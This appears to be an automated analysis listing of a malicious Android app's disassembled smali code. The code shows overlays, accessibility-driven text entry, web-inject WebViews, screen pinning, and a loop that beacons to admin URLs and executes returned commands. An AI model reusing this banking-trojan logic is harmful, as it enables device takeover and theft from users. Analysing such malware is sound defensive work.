                        • android.app.Activity.getWindow
                        • java.lang.Integer.intValue
                        • android.view.Window.setContentView
                        • android.app.Activity.getWindow
                        • java.lang.Integer.intValue
                        • android.view.Window.findViewById
                        • android.app.Activity.getIntent
                        • android.content.Intent.getStringExtra
                        • android.app.Activity.getIntent
                        • android.content.Intent.getStringExtra
                        • android.webkit.WebView.loadUrl
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • android.app.Activity.getIntent
                        • android.content.Intent.getStringExtra
                        • android.app.Activity.getIntent
                        • android.content.Intent.getStringExtra
                        • android.webkit.WebView.<init>
                        • android.app.Activity.getWindow
                        • java.lang.Integer.intValue
                        • java.lang.Integer.intValue
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        • Activity 4 T:
                        • Activity 5 T:
                        • stopWord
                        • url
                        • [func] Activity ACTIVITY_MODE_WEB T:
                        • [func] Activity ACTIVITY_MODE_PINNED [isPinned] :
                        • html
                        • bg
                        • [func] Activity ACTIVITY_MODE_PINNED T:
                        Position Instruction Meta Information
                        0.prologue
                        2invoke-virtual {p5}, Ljava/lang/Integer;->intValue()I
                        3move-result v0
                        4packed-switch v0, :pswitch_data_13a
                        5goto_7: return-void
                        6pswitch_8:
                        7invoke-virtual {p0, p1, p1}, Lcom/lib;->requestA11yAlert(Landroid/content/Context;Landroid/content/Context;)V
                        9invoke-virtual {p2}, Landroid/app/Activity;->finish()V
                        10goto/16 :goto_7
                        11pswitch_f:
                        12invoke-virtual {p0}, Lcom/lib;->createOverlayOld()Z
                        14invoke-virtual {p2}, Landroid/app/Activity;->finish()V
                        15goto/16 :goto_7
                        16pswitch_16:
                        17sget-object v0, Lcom/lib;->a11yContext:Landroid/content/Context;
                        19invoke-virtual {p0, v0}, Lcom/lib;->hideNavBarWithoutCheck(Landroid/content/Context;)Landroid/widget/FrameLayout;
                        20move-result-object v0
                        21sput-object v0, Lcom/lib;->navBar:Landroid/widget/FrameLayout;
                        23sget-object v0, Lcom/lib;->a11yContext:Landroid/content/Context;
                        25invoke-virtual {p0, v0}, Lcom/lib;->hideActBar(Landroid/content/Context;)Landroid/widget/FrameLayout;
                        26move-result-object v0
                        27sput-object v0, Lcom/lib;->actBar:Landroid/widget/FrameLayout;
                        28try_end_26:
                        29invoke-virtual {p2}, Landroid/app/Activity;->finish()V
                        30goto/16 :goto_7
                        31catch_2a: move-exception v0
                        32try_start_2b: new-instance v1, Ljava/lang/StringBuilder;
                        34invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        36const-string v2, "Activity 4 T: "
                        38invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        39move-result-object v1
                        41invoke-virtual {v1, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        42move-result-object v0
                        44invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        45move-result-object v0
                        47invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        48try_end_41:
                        49invoke-virtual {p2}, Landroid/app/Activity;->finish()V
                        50goto/16 :goto_7
                        51catchall_45: move-exception v0
                        53invoke-virtual {p2}, Landroid/app/Activity;->finish()V
                        54throw v0
                        55pswitch_4a:
                        56invoke-virtual {p0}, Lcom/lib;->createOverlayOld()Z
                        58sget-object v0, Lcom/lib;->a11yContext:Landroid/content/Context;
                        60invoke-virtual {p0, v0}, Lcom/lib;->hideNavBarWithoutCheck(Landroid/content/Context;)Landroid/widget/FrameLayout;
                        61move-result-object v0
                        62sput-object v0, Lcom/lib;->navBar:Landroid/widget/FrameLayout;
                        64sget-object v0, Lcom/lib;->a11yContext:Landroid/content/Context;
                        66invoke-virtual {p0, v0}, Lcom/lib;->hideActBar(Landroid/content/Context;)Landroid/widget/FrameLayout;
                        67move-result-object v0
                        68sput-object v0, Lcom/lib;->actBar:Landroid/widget/FrameLayout;
                        69try_end_5d:
                        70invoke-virtual {p2}, Landroid/app/Activity;->finish()V
                        71goto/16 :goto_7
                        72catch_61: move-exception v0
                        73try_start_62: new-instance v1, Ljava/lang/StringBuilder;
                        75invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        77const-string v2, "Activity 5 T: "
                        79invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        80move-result-object v1
                        82invoke-virtual {v1, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        83move-result-object v0
                        85invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        86move-result-object v0
                        88invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        89try_end_78:
                        90invoke-virtual {p2}, Landroid/app/Activity;->finish()V
                        91goto/16 :goto_7
                        92catchall_7c: move-exception v0
                        94invoke-virtual {p2}, Landroid/app/Activity;->finish()V
                        95throw v0
                        96pswitch_81:
                        97invoke-virtual {p2}, Landroid/app/Activity;->getWindow()Landroid/view/Window;
                        98move-result-object v0
                        100invoke-virtual {p3}, Ljava/lang/Integer;->intValue()I
                        101move-result v1
                        103invoke-virtual {v0, v1}, Landroid/view/Window;->setContentView(I)V
                        105invoke-virtual {p2}, Landroid/app/Activity;->getWindow()Landroid/view/Window;
                        106move-result-object v0
                        108invoke-virtual {p4}, Ljava/lang/Integer;->intValue()I
                        109move-result v1
                        111invoke-virtual {v0, v1}, Landroid/view/Window;->findViewById(I)Landroid/view/View;
                        112move-result-object v0
                        113check-cast v0, Landroid/webkit/WebView;
                        115invoke-virtual {p2}, Landroid/app/Activity;->getIntent()Landroid/content/Intent;
                        116move-result-object v1
                        118const-string v2, "stopWord"
                        120invoke-virtual {v1, v2}, Landroid/content/Intent;->getStringExtra(Ljava/lang/String;)Ljava/lang/String;
                        121move-result-object v1
                        123invoke-virtual {p0, p1, p2, v0, v1}, Lcom/lib;->setWebInjWebView(Landroid/content/Context;Landroid/app/Activity;Landroid/webkit/WebView;Ljava/lang/String;)Landroid/webkit/WebView;
                        124move-result-object v0
                        126invoke-virtual {p2}, Landroid/app/Activity;->getIntent()Landroid/content/Intent;
                        127move-result-object v1
                        129const-string v2, "url"
                        131invoke-virtual {v1, v2}, Landroid/content/Intent;->getStringExtra(Ljava/lang/String;)Ljava/lang/String;
                        132move-result-object v1
                        134invoke-virtual {v0, v1}, Landroid/webkit/WebView;->loadUrl(Ljava/lang/String;)V
                        135try_end_b5: goto/16 :goto_7
                        136catch_b7: move-exception v0
                        137new-instance v1, Ljava/lang/StringBuilder;
                        139invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        141const-string v2, "[func] Activity ACTIVITY_MODE_WEB T: "
                        143invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        144move-result-object v1
                        146invoke-virtual {v1, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        147move-result-object v0
                        149invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        150move-result-object v0
                        152invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        153goto/16 :goto_7
                        154try_start_d0: new-instance v0, Ljava/lang/StringBuilder;
                        156invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V
                        158const-string v1, "[func] Activity ACTIVITY_MODE_PINNED [isPinned] : "
                        160invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        161move-result-object v0
                        162sget-boolean v1, Lcom/lib;->isPinned:Z
                        164invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Z)Ljava/lang/StringBuilder;
                        165move-result-object v0
                        167invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        168move-result-object v0
                        170invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        172invoke-virtual {p2}, Landroid/app/Activity;->getIntent()Landroid/content/Intent;
                        173move-result-object v0
                        175const-string v1, "html"
                        177invoke-virtual {v0, v1}, Landroid/content/Intent;->getStringExtra(Ljava/lang/String;)Ljava/lang/String;
                        178move-result-object v6
                        180invoke-virtual {p2}, Landroid/app/Activity;->getIntent()Landroid/content/Intent;
                        181move-result-object v0
                        183const-string v1, "bg"
                        185invoke-virtual {v0, v1}, Landroid/content/Intent;->getStringExtra(Ljava/lang/String;)Ljava/lang/String;
                        186move-result-object v7
                        187new-instance v0, Landroid/webkit/WebView;
                        189sget-object v1, Lcom/lib;->a11yContext:Landroid/content/Context;
                        191invoke-direct {v0, v1}, Landroid/webkit/WebView;-><init>(Landroid/content/Context;)V
                        192sput-object v0, Lcom/lib;->pinnedHintView:Landroid/webkit/WebView;
                        194sget-object v0, Lcom/lib;->a11yContext:Landroid/content/Context;
                        196sget-object v1, Lcom/lib;->pinnedHintView:Landroid/webkit/WebView;
                        198invoke-static {v0, v1, v7}, Lcom/lib;->hidePinnedHint(Landroid/content/Context;Landroid/webkit/WebView;Ljava/lang/String;)Z
                        200invoke-virtual {p2}, Landroid/app/Activity;->getWindow()Landroid/view/Window;
                        201move-result-object v3
                        203invoke-virtual {p3}, Ljava/lang/Integer;->intValue()I
                        204move-result v4
                        206invoke-virtual {p4}, Ljava/lang/Integer;->intValue()I
                        207move-result v5
                        208move-object v0, p0
                        209move-object v1, p1
                        210move-object v2, p2
                        212invoke-virtual/range {v0 .. v7}, Lcom/lib;->makePinned(Landroid/content/Context;Landroid/app/Activity;Landroid/view/Window;IILjava/lang/String;Ljava/lang/String;)V
                        213try_end_11e: goto/16 :goto_7
                        214catch_120: move-exception v0
                        215new-instance v1, Ljava/lang/StringBuilder;
                        217invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        219const-string v2, "[func] Activity ACTIVITY_MODE_PINNED T: "
                        221invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        222move-result-object v1
                        224invoke-virtual {v1, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        225move-result-object v0
                        227invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        228move-result-object v0
                        230invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        231goto/16 :goto_7
                        232nop
                        Cross References
                        APIs
                        • java.util.List.iterator
                        • java.util.Iterator.hasNext
                        • java.util.Iterator.next
                        • org.json.JSONObject.toString
                        • org.json.JSONObject.<init>
                        • org.json.JSONObject.isNull
                        • org.json.JSONObject.get
                        • java.lang.Object.equals
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • org.json.JSONObject.get
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • org.json.JSONObject.isNull
                        • org.json.JSONObject.getJSONObject
                        • org.json.JSONObject.isNull
                        • org.json.JSONObject.getJSONArray
                        • org.json.JSONObject.isNull
                        • org.json.JSONObject.getJSONObject
                        • java.lang.Long.longValue
                        • java.lang.Thread.sleep
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.Integer.intValue
                        • java.lang.Thread.sleep
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        • status
                        • [func] [knock] isKnocked:
                        • [func] [knock] [isLibUpdating:
                        • ] ie:
                        • [func] [knock] [resultJSON] T:
                        • [func] [knock] T:
                        Position Instruction Meta Information
                        0.prologue
                        1try_start_0: sget-boolean v0, Lcom/lib;->isLibUpdating:Z
                        2if-nez v0, :cond_92
                        4invoke-virtual {p0}, Lcom/lib;->getAdminUrls()Ljava/util/List;
                        5move-result-object v0
                        7invoke-interface {v0}, Ljava/util/List;->iterator()Ljava/util/Iterator;
                        8move-result-object v1
                        9goto_c:
                        10invoke-interface {v1}, Ljava/util/Iterator;->hasNext()Z
                        11move-result v0
                        12if-eqz v0, :cond_92
                        14invoke-interface {v1}, Ljava/util/Iterator;->next()Ljava/lang/Object;
                        15move-result-object v0
                        16check-cast v0, Ljava/lang/String;
                        18invoke-virtual {p0, p1}, Lcom/lib;->makeKnockPacket(Landroid/content/Context;)Lorg/json/JSONObject;
                        19move-result-object v2
                        21invoke-virtual {v2}, Lorg/json/JSONObject;->toString()Ljava/lang/String;
                        22move-result-object v2
                        24iget-object v3, p0, Lcom/lib;->timeout:Ljava/lang/Integer;
                        26invoke-virtual {p0, v0, v2, v3}, Lcom/lib;->sendPost(Ljava/lang/String;Ljava/lang/String;Ljava/lang/Integer;)Ljava/lang/String;
                        27try_end_25: move-result-object v0
                        28if-eqz v0, :cond_df
                        29try_start_28: new-instance v2, Lorg/json/JSONObject;
                        31invoke-direct {v2, v0}, Lorg/json/JSONObject;-><init>(Ljava/lang/String;)V
                        33const-string v0, "status"
                        35invoke-virtual {v2, v0}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        36move-result v0
                        37if-nez v0, :cond_df
                        39const-string v0, "status"
                        41invoke-virtual {v2, v0}, Lorg/json/JSONObject;->get(Ljava/lang/String;)Ljava/lang/Object;
                        42move-result-object v0
                        44sget-object v3, Lcom/lib;->STRINGS_OK:Ljava/lang/String;
                        46invoke-virtual {v0, v3}, Ljava/lang/Object;->equals(Ljava/lang/Object;)Z
                        47move-result v0
                        48if-eqz v0, :cond_df
                        49new-instance v0, Ljava/lang/StringBuilder;
                        51invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V
                        53const-string v3, "[func] [knock] isKnocked: "
                        55invoke-virtual {v0, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        56move-result-object v0
                        58const-string v3, "status"
                        60invoke-virtual {v2, v3}, Lorg/json/JSONObject;->get(Ljava/lang/String;)Ljava/lang/Object;
                        61move-result-object v3
                        63invoke-virtual {v0, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        64move-result-object v0
                        66invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        67move-result-object v0
                        69invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        71sget-object v0, Lcom/lib;->STRINGS_CONFIG:Ljava/lang/String;
                        73invoke-virtual {v2, v0}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        74move-result v0
                        75if-nez v0, :cond_70
                        77sget-object v0, Lcom/lib;->STRINGS_CONFIG:Ljava/lang/String;
                        79invoke-virtual {v2, v0}, Lorg/json/JSONObject;->getJSONObject(Ljava/lang/String;)Lorg/json/JSONObject;
                        80move-result-object v0
                        82invoke-virtual {p0, p1, v0}, Lcom/lib;->parseConfig(Landroid/content/Context;Lorg/json/JSONObject;)Z
                        83cond_70:
                        84sget-object v0, Lcom/lib;->STRINGS_COMMANDS:Ljava/lang/String;
                        86invoke-virtual {v2, v0}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        87move-result v0
                        88if-nez v0, :cond_81
                        90sget-object v0, Lcom/lib;->STRINGS_COMMANDS:Ljava/lang/String;
                        92invoke-virtual {v2, v0}, Lorg/json/JSONObject;->getJSONArray(Ljava/lang/String;)Lorg/json/JSONArray;
                        93move-result-object v0
                        95invoke-virtual {p0, p1, v0}, Lcom/lib;->parseCommand(Landroid/content/Context;Lorg/json/JSONArray;)Z
                        96cond_81:
                        97sget-object v0, Lcom/lib;->STRINGS_LIB:Ljava/lang/String;
                        99invoke-virtual {v2, v0}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        100move-result v0
                        101if-nez v0, :cond_92
                        103sget-object v0, Lcom/lib;->STRINGS_LIB:Ljava/lang/String;
                        105invoke-virtual {v2, v0}, Lorg/json/JSONObject;->getJSONObject(Ljava/lang/String;)Lorg/json/JSONObject;
                        106move-result-object v0
                        108invoke-virtual {p0, p1, v0}, Lcom/lib;->parseLib(Landroid/content/Context;Lorg/json/JSONObject;)Z
                        109cond_92:
                        110iget-object v0, p0, Lcom/lib;->knockDelay:Ljava/lang/Long;
                        112invoke-virtual {v0}, Ljava/lang/Long;->longValue()J
                        113move-result-wide v0
                        114const-wide/16 v2, 0x3e8
                        115mul-long/2addr v0, v2
                        117invoke-static {v0, v1}, Ljava/lang/Thread;->sleep(J)V
                        118try_end_9e: goto/16 :goto_0
                        119catch_a0: move-exception v0
                        120new-instance v1, Ljava/lang/StringBuilder;
                        122invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        124const-string v2, "[func] [knock] [isLibUpdating: "
                        126invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        127move-result-object v1
                        128sget-boolean v2, Lcom/lib;->isLibUpdating:Z
                        130invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Z)Ljava/lang/StringBuilder;
                        131move-result-object v1
                        133const-string v2, "] ie: "
                        135invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        136move-result-object v1
                        138invoke-virtual {v1, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        139move-result-object v0
                        141invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        142move-result-object v0
                        144invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        145sget-boolean v0, Lcom/lib;->isLibUpdating:Z
                        146if-eqz v0, :cond_c7
                        147cond_c7: return-void
                        148catch_c8: move-exception v0
                        149try_start_c9: new-instance v2, Ljava/lang/StringBuilder;
                        151invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        153const-string v3, "[func] [knock] [resultJSON] T: "
                        155invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        156move-result-object v2
                        158invoke-virtual {v2, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        159move-result-object v0
                        161invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        162move-result-object v0
                        164invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        165cond_df:
                        166iget-object v0, p0, Lcom/lib;->timeout:Ljava/lang/Integer;
                        168invoke-virtual {v0}, Ljava/lang/Integer;->intValue()I
                        169move-result v0
                        170mul-int/lit16 v0, v0, 0x3e8
                        171int-to-long v2, v0
                        173invoke-static {v2, v3}, Ljava/lang/Thread;->sleep(J)V
                        174try_end_eb: goto/16 :goto_c
                        175catch_ed: move-exception v0
                        176new-instance v1, Ljava/lang/StringBuilder;
                        178invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        180const-string v2, "[func] [knock] T: "
                        182invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        183move-result-object v1
                        185invoke-virtual {v1, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        186move-result-object v0
                        188invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        189move-result-object v0
                        191invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        192goto/16 :goto_c7
                        Cross References
                        APIs
                        • android.os.Bundle.<init>
                        • org.json.JSONObject.isNull
                        • org.json.JSONObject.getString
                        • org.json.JSONObject.isNull
                        • org.json.JSONObject.getString
                        • org.json.JSONObject.getString
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • org.json.JSONObject.isNull
                        • org.json.JSONObject.getInt
                        • java.lang.Integer.valueOf
                        • org.json.JSONObject.isNull
                        • org.json.JSONObject.getString
                        • org.json.JSONObject.getString
                        • java.lang.Integer.parseInt
                        • java.lang.Integer.valueOf
                        • java.lang.Integer.intValue
                        • java.lang.String.charAt
                        • java.lang.String.valueOf
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • android.os.Bundle.putCharSequence
                        • android.view.accessibility.AccessibilityNodeInfo.performAction
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        • data
                        • var
                        • text:
                        • charPos
                        • posByVar
                        • ACTION_ARGUMENT_SET_TEXT_CHARSEQUENCE
                        • [makeSetText] T:
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v0, 0x0
                        2try_start_1:
                        3invoke-direct {p0, p1, p2}, Lcom/lib;->getElement(Landroid/view/accessibility/AccessibilityNodeInfo;Lorg/json/JSONObject;)Landroid/view/accessibility/AccessibilityNodeInfo;
                        4move-result-object v3
                        5if-eqz v3, :cond_31
                        6new-instance v4, Landroid/os/Bundle;
                        8invoke-direct {v4}, Landroid/os/Bundle;-><init>()V
                        9const/4 v1, 0x0
                        11const-string v2, "data"
                        13invoke-virtual {p2, v2}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        14move-result v2
                        15if-nez v2, :cond_1b
                        17const-string v1, "data"
                        19invoke-virtual {p2, v1}, Lorg/json/JSONObject;->getString(Ljava/lang/String;)Ljava/lang/String;
                        20move-result-object v1
                        21cond_1b:
                        22const-string v2, "var"
                        24invoke-virtual {p2, v2}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        25move-result v2
                        26if-nez v2, :cond_2f
                        28sget-object v1, Lcom/lib;->grabBuffer:Lorg/json/JSONObject;
                        30const-string v2, "var"
                        32invoke-virtual {p2, v2}, Lorg/json/JSONObject;->getString(Ljava/lang/String;)Ljava/lang/String;
                        33move-result-object v2
                        35invoke-virtual {v1, v2}, Lorg/json/JSONObject;->getString(Ljava/lang/String;)Ljava/lang/String;
                        36move-result-object v1
                        37cond_2f: if-nez v1, :cond_32
                        38goto_31: return v0
                        39cond_32: new-instance v2, Ljava/lang/StringBuilder;
                        41invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        43const-string v5, "text: "
                        45invoke-virtual {v2, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        46move-result-object v2
                        48invoke-virtual {v2, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        49move-result-object v2
                        51invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        52move-result-object v2
                        54invoke-virtual {p0, v2}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        56const-string v2, "charPos"
                        58invoke-virtual {p2, v2}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        59move-result v2
                        60if-nez v2, :cond_84
                        62const-string v2, "charPos"
                        64invoke-virtual {p2, v2}, Lorg/json/JSONObject;->getInt(Ljava/lang/String;)I
                        65move-result v2
                        67invoke-static {v2}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        68move-result-object v2
                        70const-string v5, "posByVar"
                        72invoke-virtual {p2, v5}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        73move-result v5
                        74if-nez v5, :cond_76
                        76sget-object v2, Lcom/lib;->grabBuffer:Lorg/json/JSONObject;
                        78const-string v5, "posByVar"
                        80invoke-virtual {p2, v5}, Lorg/json/JSONObject;->getString(Ljava/lang/String;)Ljava/lang/String;
                        81move-result-object v5
                        83invoke-virtual {v2, v5}, Lorg/json/JSONObject;->getString(Ljava/lang/String;)Ljava/lang/String;
                        84move-result-object v2
                        86invoke-static {v2}, Ljava/lang/Integer;->parseInt(Ljava/lang/String;)I
                        87move-result v2
                        89invoke-static {v2}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        90move-result-object v2
                        91cond_76:
                        92invoke-virtual {v2}, Ljava/lang/Integer;->intValue()I
                        93move-result v2
                        94add-int/lit8 v2, v2, -0x1
                        96invoke-virtual {v1, v2}, Ljava/lang/String;->charAt(I)C
                        97move-result v1
                        99invoke-static {v1}, Ljava/lang/String;->valueOf(C)Ljava/lang/String;
                        100move-result-object v1
                        101cond_84: new-instance v2, Ljava/lang/StringBuilder;
                        103invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        105const-string v5, "text: "
                        107invoke-virtual {v2, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        108move-result-object v2
                        110invoke-virtual {v2, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        111move-result-object v2
                        113invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        114move-result-object v2
                        116invoke-virtual {p0, v2}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        118const-string v2, "ACTION_ARGUMENT_SET_TEXT_CHARSEQUENCE"
                        120invoke-virtual {v4, v2, v1}, Landroid/os/Bundle;->putCharSequence(Ljava/lang/String;Ljava/lang/CharSequence;)V
                        121const/high16 v1, 0x200000
                        123invoke-virtual {v3, v1, v4}, Landroid/view/accessibility/AccessibilityNodeInfo;->performAction(ILandroid/os/Bundle;)Z
                        124try_end_a4: move-result v0
                        125goto/16 :goto_31
                        126catch_a6: move-exception v1
                        127new-instance v2, Ljava/lang/StringBuilder;
                        129invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        131const-string v3, "[makeSetText] T: "
                        133invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        134move-result-object v2
                        136invoke-virtual {v2, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        137move-result-object v1
                        139invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        140move-result-object v1
                        142invoke-virtual {p0, v1}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        143goto/16 :goto_31
                        Cross References
                        APIs
                        • org.json.JSONObject.isNull
                        • android.view.accessibility.AccessibilityNodeInfo.isClickable
                        • org.json.JSONObject.getBoolean
                        • org.json.JSONObject.isNull
                        • android.view.accessibility.AccessibilityNodeInfo.isEnabled
                        • org.json.JSONObject.getBoolean
                        • org.json.JSONObject.isNull
                        • android.view.accessibility.AccessibilityNodeInfo.getText
                        • android.view.accessibility.AccessibilityNodeInfo.getText
                        • java.lang.CharSequence.toString
                        • org.json.JSONObject.getString
                        • java.lang.String.matches
                        • org.json.JSONObject.isNull
                        • android.view.accessibility.AccessibilityNodeInfo.isCheckable
                        • org.json.JSONObject.getBoolean
                        • org.json.JSONObject.isNull
                        • android.view.accessibility.AccessibilityNodeInfo.isChecked
                        • org.json.JSONObject.getBoolean
                        • org.json.JSONObject.isNull
                        • android.view.accessibility.AccessibilityNodeInfo.isVisibleToUser
                        • org.json.JSONObject.getBoolean
                        • org.json.JSONObject.isNull
                        • android.view.accessibility.AccessibilityNodeInfo.isCheckable
                        • org.json.JSONObject.getBoolean
                        • org.json.JSONObject.isNull
                        • android.view.accessibility.AccessibilityNodeInfo.getContentDescription
                        • android.view.accessibility.AccessibilityNodeInfo.getContentDescription
                        • java.lang.CharSequence.toString
                        • org.json.JSONObject.getString
                        • java.lang.String.matches
                        Strings
                        • isClickable
                        • isEnabled
                        • CONTAINS
                        • isCheckable
                        • isChecked
                        • isVisibleToUser
                        • DESCRIPTION
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v0, 0x0
                        2try_start_1:
                        3const-string v1, "isClickable"
                        5invoke-virtual {p2, v1}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        6move-result v1
                        7if-nez v1, :cond_16
                        9invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityNodeInfo;->isClickable()Z
                        10move-result v1
                        12const-string v2, "isClickable"
                        14invoke-virtual {p2, v2}, Lorg/json/JSONObject;->getBoolean(Ljava/lang/String;)Z
                        15move-result v2
                        16if-eq v1, v2, :cond_16
                        17cond_15: return v0
                        18cond_16:
                        19const-string v1, "isEnabled"
                        21invoke-virtual {p2, v1}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        22move-result v1
                        23if-nez v1, :cond_2a
                        25invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityNodeInfo;->isEnabled()Z
                        26move-result v1
                        28const-string v2, "isEnabled"
                        30invoke-virtual {p2, v2}, Lorg/json/JSONObject;->getBoolean(Ljava/lang/String;)Z
                        31move-result v2
                        32if-ne v1, v2, :cond_15
                        33cond_2a:
                        34const-string v1, "CONTAINS"
                        36invoke-virtual {p2, v1}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
